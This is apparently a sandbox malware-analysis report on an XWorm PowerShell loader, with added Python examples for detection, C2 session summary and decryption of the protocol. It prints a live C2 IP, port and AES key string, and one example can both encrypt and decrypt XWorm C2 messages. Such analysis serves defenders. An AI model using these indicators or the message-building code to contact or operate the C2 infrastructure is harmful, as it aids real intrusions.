Windows Analysis Report
WErY5oc4hl.ps1

Overview

General Information

Sample name: WErY5oc4hl.ps1 (renamed because the original name is a hash value)
Original sample name: a7ee0a83c40c1d71e9730e1cbf6520b023952fb137a32a6449bd0edffcedf3d5.ps1
Analysis ID: 1577166
MD5: f20ada3727c5c319d22931d7bc63a007
SHA1: 242d29871bb91f4d3a48cdde6a46df7f458ae22a
SHA256: a7ee0a83c40c1d71e9730e1cbf6520b023952fb137a32a6449bd0edffcedf3d5
Tags: 92-255-57-155, ps1, user-JAMESWT_MHT

Detection

XWorm
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 7516 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 7552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7560 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 7280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Malware Configuration

Xworm: {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author (matched strings listed under the row)
00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xaa5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xaaf9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xac0e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xa81e:$cnc4: POST / HTTP/1.1
00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1a884:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1a921:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1aa36:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1a646:$cnc4: POST / HTTP/1.1
(truncated; 6 entries in the full report)

Source | Rule | Description | Author (matched strings listed under the row)
5.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
5.2.RegSvcs.exe.400000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xac5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xacf9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xae0e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xaa1e:$cnc4: POST / HTTP/1.1
0.2.powershell.exe.21380403568.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.21380403568.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8e5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8ef9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x900e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8c1e:$cnc4: POST / HTTP/1.1
0.2.powershell.exe.213812227a0.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(truncated; 5 entries in the full report)

              System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", ProcessId: 7296, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", ProcessId: 7296, ProcessName: powershell.exe
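The Sigma hit above and the process tree describe one loader shape: PowerShell started with -ExecutionPolicy unrestricted, which then launches the signed .NET utility RegSvcs.exe twice with an empty command line (the report's "Creates a process in suspended mode", "Writes to foreign memory regions" and the XWorm Yara hits inside 5.2.RegSvcs.exe.400000.0.unpack), with one instance crashing into WerFault.exe. The following is an added example, not code from this report or from Joe Sandbox: it runs that detection logic over constructed, Sysmon-like process-creation events modelled on the tree above. The execution-policy regex is my approximation of the Sigma rule's logic, and the list of .NET hosts is analyst-chosen (RegSvcs.exe is the only one the report shows).

```python
import re

# Constructed process-creation events modelled on the process tree in this report.
# Field names are Sysmon-like; this is not the report's own format.
EVENTS = [
    {"pid": 7296, "ppid": 4056,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1"'},
    {"pid": 7304, "ppid": 7296, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 7516, "ppid": 7296, "image": r"C:\Windows\system32\ipconfig.exe",
     "cmdline": r'"C:\Windows\system32\ipconfig.exe" /flushdns'},
    {"pid": 7552, "ppid": 7296, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"pid": 7560, "ppid": 7296, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"pid": 7280, "ppid": 7560, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704"},
]

# Signed .NET Framework utilities commonly abused as injection targets (analyst-chosen list;
# RegSvcs.exe is the one this report shows) and the script hosts that typically spawn them.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe",
                "applaunch.exe", "aspnet_compiler.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Approximation of the Sigma logic behind "Change PowerShell Policies to an Insecure Level":
# -ExecutionPolicy (or an unambiguous prefix such as -ex / -ep) set to Bypass or Unrestricted.
POLICY_RE = re.compile(r"-e[xp]\w*\s+(?:bypass|unrestricted)\b", re.IGNORECASE)
WERFAULT_RE = re.compile(r"-p\s+(\d+)")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def argument_string(cmdline: str) -> str:
    """Return everything after the executable token (quoted or bare) of a Windows command line."""
    m = re.match(r'^(?:"[^"]*"|\S+)\s*(.*)$', cmdline.strip())
    return m.group(1) if m else ""


def detect(events):
    """Return (rule, pid) hits for the loader pattern seen in this report."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    suspected_hosts = set()
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        if name in {"powershell.exe", "pwsh.exe"} and POLICY_RE.search(e["cmdline"]):
            hits.append(("powershell_insecure_execution_policy", e["pid"]))
        # A .NET host started by a script host with no arguments has no legitimate job to do;
        # that is the shape of a suspended process created to receive an injected payload.
        if name in DOTNET_HOSTS and parent_name in SCRIPT_HOSTS and not argument_string(e["cmdline"]):
            hits.append(("dotnet_host_spawned_without_arguments", e["pid"]))
            suspected_hosts.add(e["pid"])
    # Second pass: WerFault -p <pid> for a suspected host corroborates a botched injection.
    for e in events:
        if basename(e["image"]) == "werfault.exe":
            m = WERFAULT_RE.search(e["cmdline"])
            if m and int(m.group(1)) in suspected_hosts:
                hits.append(("crash_in_suspected_injection_host", int(m.group(1))))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")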
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T08:15:42.687040+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:15:55.132992+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:15:58.442712+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:07.680452+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:20.460191+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:28.596991+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:32.774138+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:36.366021+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:43.293961+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:51.430755+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:58.869971+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:59.242947+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:04.430160+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:04.621094+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:04.743277+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:04.934293+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:15.291141+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:15.482157+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:20.387690+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:20.728031+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:21.133907+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:21.324994+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:28.636059+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:54.256561+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:58.429921+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP

2024-12-18T08:15:42.745508+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:55.134693+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:07.682242+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:20.463819+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:32.775981+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:36.368542+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:43.296108+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:51.433298+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:59.247247+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:04.432459+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:04.622708+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:04.745103+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:04.943036+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:15.295456+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:15.486296+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:20.415519+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:21.143105+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:21.327680+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP

2024-12-18T08:15:58.442712+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP

2024-12-18T08:15:42.199229+0100 | 2858800 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
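Every alert in the table above carries the same client ephemeral port (49723), so the 45 hits are one long-lived TCP session to 92.255.57.155:4411 that opens with an outbound PING (SID 2858800) and is then kept alive by check-in traffic, with no DNS lookup in front of it. The block below is an added example, not part of the report: it parses a constructed subset of those rows (pipe-separated, copied from the table), collapses both directions into one session, and emits the block-list and timeline facts an incident responder would pull from it. The SID-to-rule-name mapping is taken from the Networking section of this report.

```python
import ipaddress
from collections import Counter
from datetime import datetime

# Rule names for the SIDs in this report (from the Networking section).
SID_NAMES = {
    2858800: "ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound",
    2852870: "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes",
    2852923: "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)",
    2858801: "ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound",
}

# Constructed input: a subset of the rows from this report's Suricata alert table, written as
# timestamp|sid|severity|classtype|src ip|src port|dst ip|dst port|proto.
ALERT_ROWS = """\
2024-12-18T08:15:42.199229+0100|2858800|1|Malware Command and Control Activity Detected|192.168.2.7|49723|92.255.57.155|4411|TCP
2024-12-18T08:15:42.687040+0100|2852870|1|Malware Command and Control Activity Detected|92.255.57.155|4411|192.168.2.7|49723|TCP
2024-12-18T08:15:42.745508+0100|2852923|1|Malware Command and Control Activity Detected|192.168.2.7|49723|92.255.57.155|4411|TCP
2024-12-18T08:15:55.132992+0100|2852870|1|Malware Command and Control Activity Detected|92.255.57.155|4411|192.168.2.7|49723|TCP
2024-12-18T08:15:55.134693+0100|2852923|1|Malware Command and Control Activity Detected|192.168.2.7|49723|92.255.57.155|4411|TCP
2024-12-18T08:15:58.442712+0100|2852870|1|Malware Command and Control Activity Detected|92.255.57.155|4411|192.168.2.7|49723|TCP
2024-12-18T08:15:58.442712+0100|2858801|1|Malware Command and Control Activity Detected|92.255.57.155|4411|192.168.2.7|49723|TCP
2024-12-18T08:16:07.682242+0100|2852923|1|Malware Command and Control Activity Detected|192.168.2.7|49723|92.255.57.155|4411|TCP
2024-12-18T08:17:58.429921+0100|2852870|1|Malware Command and Control Activity Detected|92.255.57.155|4411|192.168.2.7|49723|TCP
"""


def parse_alerts(text):
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sev, cls, sip, sport, dip, dport, proto = line.split("|")
        alerts.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "severity": int(sev), "classtype": cls,
            "src": (sip, int(sport)), "dst": (dip, int(dport)), "proto": proto,
        })
    return alerts


def is_outbound(alert):
    # Direction from the address family: private source means the sandbox host sent it.
    return ipaddress.ip_address(alert["src"][0]).is_private


def session_key(alert):
    """(internal endpoint, external endpoint), so both directions of one TCP session collapse together."""
    return (alert["src"], alert["dst"]) if is_outbound(alert) else (alert["dst"], alert["src"])


def summarize_sessions(alerts):
    sessions = {}
    for a in alerts:
        s = sessions.setdefault(session_key(a), {"sids": Counter(), "outbound": 0, "inbound": 0,
                                                  "first": a["ts"], "last": a["ts"]})
        s["sids"][a["sid"]] += 1
        s["outbound" if is_outbound(a) else "inbound"] += 1
        s["first"] = min(s["first"], a["ts"])
        s["last"] = max(s["last"], a["ts"])
    return sessions


def c2_indicators(sessions):
    """One (external ip, port, duration seconds, alert count, rule names) tuple per session."""
    out = []
    for (_internal, external), s in sessions.items():
        names = sorted(SID_NAMES.get(sid, f"sid {sid}") for sid in s["sids"])
        out.append((external[0], external[1],
                    (s["last"] - s["first"]).total_seconds(), sum(s["sids"].values()), names))
    return out


if __name__ == "__main__":
    for ip, port, seconds, count, names in c2_indicators(summarize_sessions(parse_alerts(ALERT_ROWS))):
        print(f"block {ip}:{port}  ({count} alerts over {seconds:.1f}s)")
        for n in names:
            print("  ", n)
```

Because the C2 address is hard-coded and reached without DNS, the host-level indicator is the RegSvcs.exe process owning a connection to a non-standard port, and the network-level one is the IP:port pair; the ETPRO signatures are the portable detection, since the address changes per build.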


              AV Detection

Source: 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: WErY5oc4hl.ps1 | Virustotal: Detection: 31%
Source: WErY5oc4hl.ps1 | ReversingLabs: Detection: 21%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 0.2.powershell.exe.21380403568.0.unpack | String decryptor: 92.255.57.155
Source: 0.2.powershell.exe.21380403568.0.unpack | String decryptor: 4411
Source: 0.2.powershell.exe.21380403568.0.unpack | String decryptor: P0WER
Source: 0.2.powershell.exe.21380403568.0.unpack | String decryptor: <Xwormmm>
Source: 0.2.powershell.exe.21380403568.0.unpack | String decryptor: XWorm V5.6
Source: 0.2.powershell.exe.21380403568.0.unpack | String decryptor: USB.exe
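The "Aes key" the extractor recovered ("P0WER") is not the AES key as such. Public analyses of the XWorm source describe the derivation XWorm applies before encrypting its C2 messages: MD5 of the key string, copied into a 32-byte buffer at offset 0 and again at offset 15, giving AES-256 in ECB mode with PKCS7 padding. The block below is an added example, not code from this report: it implements that derivation with the standard library and, when the third-party `cryptography` package is available, decrypts a Base64 string and splits it on the SPL separator from the config. The derivation is an assumption taken from those analyses, not something this report states, and whether the same key string also protects the config fields embedded in the binary varies by version; verify against the unpacked payload (5.2.RegSvcs.exe.400000.0.unpack) before relying on it. The sample message is constructed; no real ciphertext appears on the page, and the TCP length-prefix framing around each message is not handled here.

```python
import base64
import hashlib

# Values from this report's extracted XWorm configuration.
AES_KEY_STRING = "P0WER"
SPL = "<Xwormmm>"


def derive_aes_key(key_string: str) -> bytes:
    """Expand the configured key string into the 32-byte AES key.

    Assumed scheme (public analyses of the XWorm source, not this report): md5 = MD5(key string);
    the 32-byte key is md5[0:15] + md5[0:16] + one zero byte, because the hash is copied into
    the buffer at offset 0 and again at offset 15.
    """
    digest = hashlib.md5(key_string.encode("utf-8")).digest()
    key = bytearray(32)
    key[0:16] = digest
    key[15:31] = digest
    return bytes(key)


def _aes_ecb(key: bytes):
    # Imported lazily so the key derivation runs without third-party packages.
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    return Cipher(algorithms.AES(key), modes.ECB())


def xworm_decrypt(key_string: str, b64_ciphertext: str) -> str:
    """Decrypt one Base64-encoded XWorm string: AES-256-ECB with PKCS7 padding."""
    from cryptography.hazmat.primitives import padding
    data = base64.b64decode(b64_ciphertext)
    dec = _aes_ecb(derive_aes_key(key_string)).decryptor()
    padded = dec.update(data) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return (unpadder.update(padded) + unpadder.finalize()).decode("utf-8")


def xworm_encrypt(key_string: str, plaintext: str) -> str:
    """Inverse of xworm_decrypt; used here only to build a constructed sample message."""
    from cryptography.hazmat.primitives import padding
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext.encode("utf-8")) + padder.finalize()
    enc = _aes_ecb(derive_aes_key(key_string)).encryptor()
    return base64.b64encode(enc.update(padded) + enc.finalize()).decode("ascii")


def split_message(plaintext: str) -> list:
    """C2 messages are fields joined with the SPL separator from the config."""
    return plaintext.split(SPL)


if __name__ == "__main__":
    print("derived key:", derive_aes_key(AES_KEY_STRING).hex())
    try:
        # Constructed placeholder fields; the real command vocabulary is not shown on this page.
        sample = xworm_encrypt(AES_KEY_STRING, SPL.join(["PING", "constructed-field"]))
        print("round trip:", split_message(xworm_decrypt(AES_KEY_STRING, sample)))
    except ImportError:
        print("install the 'cryptography' package to run the AES part")
```

Note the asymmetry in the derived key: bytes 0 to 14 and 15 to 29 are identical and byte 31 is always zero, so two XWorm builds with the same key string share a key and ECB leaks repeated 16-byte plaintext blocks across messages, which is why a captured stream can be matched on structure even before decryption.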
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb[ source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\RegSvcs.pdbF2 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb" source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB89 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb^2 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
